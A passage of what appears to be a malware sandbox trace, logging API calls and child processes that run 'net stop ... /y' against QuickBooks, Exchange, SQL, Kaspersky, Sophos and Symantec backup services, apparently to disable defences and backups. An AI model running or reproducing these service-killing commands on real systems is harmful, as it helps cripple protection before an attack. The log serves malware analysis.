lpServiceName=0x3faaf0, lpcchBuffer=0x18fbd0 | out: lpServiceName="", lpcchBuffer=0x18fbd0) returned 0 [0107.020] _wcsicmp (_String1="msg", _String2="QBCFMONITORSERVICE") returned -4 [0107.020] _wcsicmp (_String1="messenger", _String2="QBCFMONITORSERVICE") returned -4 [0107.020] _wcsicmp (_String1="receiver", _String2="QBCFMONITORSERVICE") returned 1 [0107.020] _wcsicmp (_String1="rcv", _String2="QBCFMONITORSERVICE") returned 1 [0107.020] _wcsicmp (_String1="redirector", _String2="QBCFMONITORSERVICE") returned 1 [0107.020] _wcsicmp (_String1="redir", _String2="QBCFMONITORSERVICE") returned 1 [0107.020] _wcsicmp (_String1="rdr", _String2="QBCFMONITORSERVICE") returned 1 [0107.020] _wcsicmp (_String1="workstation", _String2="QBCFMONITORSERVICE") returned 6 [0107.020] _wcsicmp (_String1="work", _String2="QBCFMONITORSERVICE") returned 6 [0107.020] _wcsicmp (_String1="wksta", _String2="QBCFMONITORSERVICE") returned 6 [0107.020] _wcsicmp (_String1="prdr", _String2="QBCFMONITORSERVICE") returned -1 [0107.020] _wcsicmp (_String1="devrdr", _String2="QBCFMONITORSERVICE") returned -13 [0107.020] _wcsicmp (_String1="lanmanworkstation", _String2="QBCFMONITORSERVICE") returned -5 [0107.020] _wcsicmp (_String1="server", _String2="QBCFMONITORSERVICE") returned 2 [0107.020] _wcsicmp (_String1="svr", _String2="QBCFMONITORSERVICE") returned 2 [0107.020] _wcsicmp (_String1="srv", _String2="QBCFMONITORSERVICE") returned 2 [0107.020] _wcsicmp (_String1="lanmanserver", _String2="QBCFMONITORSERVICE") returned -5 [0107.020] _wcsicmp (_String1="alerter", _String2="QBCFMONITORSERVICE") returned -16 [0107.021] _wcsicmp (_String1="netlogon", _String2="QBCFMONITORSERVICE") returned -3 [0107.021] NetServiceControl (in: servername=0x0, service="QBCFMONITORSERVICE", opcode=0x0, arg=0x0, bufptr=0x18fbcc | out: bufptr=0x18fbcc) returned 0x889 [0107.021] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.021] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.022] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.023] GetFileType (hFile=0x0) returned 0x0 [0107.023] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x803e68 [0107.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x803e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0107.023] WriteFile (in: hFile=0x0, lpBuffer=0x803e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18fb0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fb0c, lpOverlapped=0x0) returned 0 [0107.023] LocalFree (hMem=0x803e68) returned 0x0 [0107.023] GetFileType (hFile=0x0) returned 0x0 [0107.023] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806110 [0107.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0107.023] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fb0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fb0c, lpOverlapped=0x0) returned 0 [0107.023] LocalFree (hMem=0x806110) returned 0x0 [0107.023] _ultow (in: _Dest=0x889, _Radix=1637180 | out: _Dest=0x889) returned="2185" [0107.023] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.023] GetFileType (hFile=0x0) returned 0x0 [0107.023] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x806110 [0107.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x806110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.023] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fb18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fb18, lpOverlapped=0x0) returned 0 [0107.023] LocalFree (hMem=0x806110) returned 0x0 [0107.023] GetFileType (hFile=0x0) returned 0x0 [0107.023] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x806110 [0107.023] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x806110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x80", lpUsedDefaultChar=0x0) returned 2 [0107.023] WriteFile (in: hFile=0x0, lpBuffer=0x806110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fb18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fb18, lpOverlapped=0x0) returned 0 [0107.024] LocalFree (hMem=0x806110) returned 0x0 [0107.024] NetApiBufferFree (Buffer=0x801af8) returned 0x0 [0107.024] NetApiBufferFree (Buffer=0x801b10) returned 0x0 [0107.024] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBCFMonitorService /y" [0107.024] exit (_Code=2) Process: id = "147" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x23957000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x72c" cmd_line = "C:\\Windows\\system32\\net1 stop Intuit.QuickBooks.FCS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 521 os_tid = 0x914 [0106.553] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffe44 | out: lpSystemTimeAsFileTime=0x2ffe44*(dwLowDateTime=0x148872b0, dwHighDateTime=0x1d6f0d1)) [0106.553] GetCurrentProcessId () returned 0x69c [0106.553] GetCurrentThreadId () returned 0x914 [0106.554] GetTickCount () returned 0x114e84d [0106.554] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffe3c | out: lpPerformanceCount=0x2ffe3c*=22565443323) returned 1 [0106.554] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0106.554] __set_app_type (_Type=0x1) [0106.554] __p__fmode () returned 0x770331f4 [0106.554] __p__commode () returned 0x770331fc [0106.554] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0106.554] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0106.554] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.554] GetConsoleOutputCP () returned 0x1b5 [0107.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0107.025] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.028] sprintf_s (in: _DstBuf=0x2ffdfc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.028] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0107.030] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.030] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Intuit.QuickBooks.FCS /y" [0107.030] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ffbc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0107.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7e) returned 0x553af8 [0107.031] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.031] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffdcc | out: Buffer=0x2ffdcc*=0x551b00) returned 0x0 [0107.031] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffdcc | out: Buffer=0x2ffdcc*=0x551b18) returned 0x0 [0107.031] _fileno (_File=0x77032900) returned -2 [0107.031] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0107.031] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.031] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.031] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.031] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.031] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.031] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.031] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.031] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.031] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.031] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.031] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.031] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.031] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.031] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.031] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.031] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.031] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.031] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.032] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.032] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.032] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.032] _wcsicmp (_String1="accounts", _String2="Intuit.QuickBooks.FCS") returned -8 [0107.032] _wcsicmp (_String1="computer", _String2="Intuit.QuickBooks.FCS") returned -6 [0107.032] _wcsicmp (_String1="config", _String2="Intuit.QuickBooks.FCS") returned -6 [0107.032] _wcsicmp (_String1="continue", _String2="Intuit.QuickBooks.FCS") returned -6 [0107.032] _wcsicmp (_String1="cont", _String2="Intuit.QuickBooks.FCS") returned -6 [0107.032] _wcsicmp (_String1="file", _String2="Intuit.QuickBooks.FCS") returned -3 [0107.032] _wcsicmp (_String1="files", _String2="Intuit.QuickBooks.FCS") returned -3 [0107.032] _wcsicmp (_String1="group", _String2="Intuit.QuickBooks.FCS") returned -2 [0107.032] _wcsicmp (_String1="groups", _String2="Intuit.QuickBooks.FCS") returned -2 [0107.032] _wcsicmp (_String1="help", _String2="Intuit.QuickBooks.FCS") returned -1 [0107.032] _wcsicmp (_String1="helpmsg", _String2="Intuit.QuickBooks.FCS") returned -1 [0107.032] _wcsicmp (_String1="localgroup", _String2="Intuit.QuickBooks.FCS") returned 3 [0107.032] _wcsicmp (_String1="pause", _String2="Intuit.QuickBooks.FCS") returned 7 [0107.032] _wcsicmp (_String1="session", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="sessions", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="sess", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="share", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="start", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="stats", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="statistics", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="stop", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.032] _wcsicmp (_String1="time", _String2="Intuit.QuickBooks.FCS") returned 11 [0107.032] _wcsicmp (_String1="user", _String2="Intuit.QuickBooks.FCS") returned 12 [0107.032] _wcsicmp (_String1="users", _String2="Intuit.QuickBooks.FCS") returned 12 [0107.033] _wcsicmp (_String1="msg", _String2="Intuit.QuickBooks.FCS") returned 4 [0107.033] _wcsicmp (_String1="messenger", _String2="Intuit.QuickBooks.FCS") returned 4 [0107.033] _wcsicmp (_String1="receiver", _String2="Intuit.QuickBooks.FCS") returned 9 [0107.033] _wcsicmp (_String1="rcv", _String2="Intuit.QuickBooks.FCS") returned 9 [0107.033] _wcsicmp (_String1="netpopup", _String2="Intuit.QuickBooks.FCS") returned 5 [0107.033] _wcsicmp (_String1="redirector", _String2="Intuit.QuickBooks.FCS") returned 9 [0107.033] _wcsicmp (_String1="redir", _String2="Intuit.QuickBooks.FCS") returned 9 [0107.033] _wcsicmp (_String1="rdr", _String2="Intuit.QuickBooks.FCS") returned 9 [0107.033] _wcsicmp (_String1="workstation", _String2="Intuit.QuickBooks.FCS") returned 14 [0107.033] _wcsicmp (_String1="work", _String2="Intuit.QuickBooks.FCS") returned 14 [0107.033] _wcsicmp (_String1="wksta", _String2="Intuit.QuickBooks.FCS") returned 14 [0107.033] _wcsicmp (_String1="prdr", _String2="Intuit.QuickBooks.FCS") returned 7 [0107.033] _wcsicmp (_String1="devrdr", _String2="Intuit.QuickBooks.FCS") returned -5 [0107.033] _wcsicmp (_String1="lanmanworkstation", _String2="Intuit.QuickBooks.FCS") returned 3 [0107.033] _wcsicmp (_String1="server", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.033] _wcsicmp (_String1="svr", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.033] _wcsicmp (_String1="srv", _String2="Intuit.QuickBooks.FCS") returned 10 [0107.033] _wcsicmp (_String1="lanmanserver", _String2="Intuit.QuickBooks.FCS") returned 3 [0107.033] _wcsicmp (_String1="alerter", _String2="Intuit.QuickBooks.FCS") returned -8 [0107.033] _wcsicmp (_String1="netlogon", _String2="Intuit.QuickBooks.FCS") returned 5 [0107.033] _wcsupr (in: _String="Intuit.QuickBooks.FCS" | out: _String="INTUIT.QUICKBOOKS.FCS") returned="INTUIT.QUICKBOOKS.FCS" [0107.033] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5554d8 [0107.036] GetServiceKeyNameW (in: hSCManager=0x5554d8, lpDisplayName="INTUIT.QUICKBOOKS.FCS", lpServiceName=0x3faaf0, lpcchBuffer=0x2ffd68 | out: lpServiceName="", lpcchBuffer=0x2ffd68) returned 0 [0107.036] _wcsicmp (_String1="msg", _String2="INTUIT.QUICKBOOKS.FCS") returned 4 [0107.036] _wcsicmp (_String1="messenger", _String2="INTUIT.QUICKBOOKS.FCS") returned 4 [0107.036] _wcsicmp (_String1="receiver", _String2="INTUIT.QUICKBOOKS.FCS") returned 9 [0107.036] _wcsicmp (_String1="rcv", _String2="INTUIT.QUICKBOOKS.FCS") returned 9 [0107.036] _wcsicmp (_String1="redirector", _String2="INTUIT.QUICKBOOKS.FCS") returned 9 [0107.036] _wcsicmp (_String1="redir", _String2="INTUIT.QUICKBOOKS.FCS") returned 9 [0107.036] _wcsicmp (_String1="rdr", _String2="INTUIT.QUICKBOOKS.FCS") returned 9 [0107.036] _wcsicmp (_String1="workstation", _String2="INTUIT.QUICKBOOKS.FCS") returned 14 [0107.036] _wcsicmp (_String1="work", _String2="INTUIT.QUICKBOOKS.FCS") returned 14 [0107.036] _wcsicmp (_String1="wksta", _String2="INTUIT.QUICKBOOKS.FCS") returned 14 [0107.036] _wcsicmp (_String1="prdr", _String2="INTUIT.QUICKBOOKS.FCS") returned 7 [0107.036] _wcsicmp (_String1="devrdr", _String2="INTUIT.QUICKBOOKS.FCS") returned -5 [0107.036] _wcsicmp (_String1="lanmanworkstation", _String2="INTUIT.QUICKBOOKS.FCS") returned 3 [0107.036] _wcsicmp (_String1="server", _String2="INTUIT.QUICKBOOKS.FCS") returned 10 [0107.036] _wcsicmp (_String1="svr", _String2="INTUIT.QUICKBOOKS.FCS") returned 10 [0107.036] _wcsicmp (_String1="srv", _String2="INTUIT.QUICKBOOKS.FCS") returned 10 [0107.036] _wcsicmp (_String1="lanmanserver", _String2="INTUIT.QUICKBOOKS.FCS") returned 3 [0107.036] _wcsicmp (_String1="alerter", _String2="INTUIT.QUICKBOOKS.FCS") returned -8 [0107.036] _wcsicmp (_String1="netlogon", _String2="INTUIT.QUICKBOOKS.FCS") returned 5 [0107.036] NetServiceControl (in: servername=0x0, service="INTUIT.QUICKBOOKS.FCS", opcode=0x0, arg=0x0, bufptr=0x2ffd64 | out: bufptr=0x2ffd64) returned 0x889 [0107.037] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.037] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.051] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.052] GetFileType (hFile=0x0) returned 0x0 [0107.052] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x553ef8 [0107.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x553ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nT", lpUsedDefaultChar=0x0) returned 30 [0107.052] WriteFile (in: hFile=0x0, lpBuffer=0x553ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ffca4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffca4, lpOverlapped=0x0) returned 0 [0107.052] LocalFree (hMem=0x553ef8) returned 0x0 [0107.052] GetFileType (hFile=0x0) returned 0x0 [0107.052] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5561a0 [0107.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5561a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nU", lpUsedDefaultChar=0x0) returned 2 [0107.052] WriteFile (in: hFile=0x0, lpBuffer=0x5561a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffca4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffca4, lpOverlapped=0x0) returned 0 [0107.052] LocalFree (hMem=0x5561a0) returned 0x0 [0107.052] _ultow (in: _Dest=0x889, _Radix=3144916 | out: _Dest=0x889) returned="2185" [0107.052] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.052] GetFileType (hFile=0x0) returned 0x0 [0107.052] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5561a0 [0107.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5561a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.052] WriteFile (in: hFile=0x0, lpBuffer=0x5561a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ffcb0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffcb0, lpOverlapped=0x0) returned 0 [0107.052] LocalFree (hMem=0x5561a0) returned 0x0 [0107.052] GetFileType (hFile=0x0) returned 0x0 [0107.052] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5561a0 [0107.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5561a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nU", lpUsedDefaultChar=0x0) returned 2 [0107.052] WriteFile (in: hFile=0x0, lpBuffer=0x5561a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffcb0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ffcb0, lpOverlapped=0x0) returned 0 [0107.052] LocalFree (hMem=0x5561a0) returned 0x0 [0107.053] NetApiBufferFree (Buffer=0x551b00) returned 0x0 [0107.053] NetApiBufferFree (Buffer=0x551b18) returned 0x0 [0107.053] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Intuit.QuickBooks.FCS /y" [0107.053] exit (_Code=2) Process: id = "148" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x22f8c000" os_pid = "0x1004" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop CASAD2DWebSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 523 os_tid = 0x1008 Process: id = "149" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1be91000" os_pid = "0x100c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop klnagent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 524 os_tid = 0x1010 Process: id = "150" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x22c96000" os_pid = "0x1014" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MsDtsServer110 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 525 os_tid = 0x1018 Process: id = "151" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2309b000" os_pid = "0x101c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SstpSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 526 os_tid = 0x1020 Process: id = "152" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x23ea0000" os_pid = "0x1024" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeMTA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 527 os_tid = 0x1028 Process: id = "153" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x252a5000" os_pid = "0x102c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Device Control Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 528 os_tid = 0x1030 Process: id = "154" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25baa000" os_pid = "0x1034" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 529 os_tid = 0x1038 Process: id = "155" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x249af000" os_pid = "0x103c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Symantec System Recovery” /y" 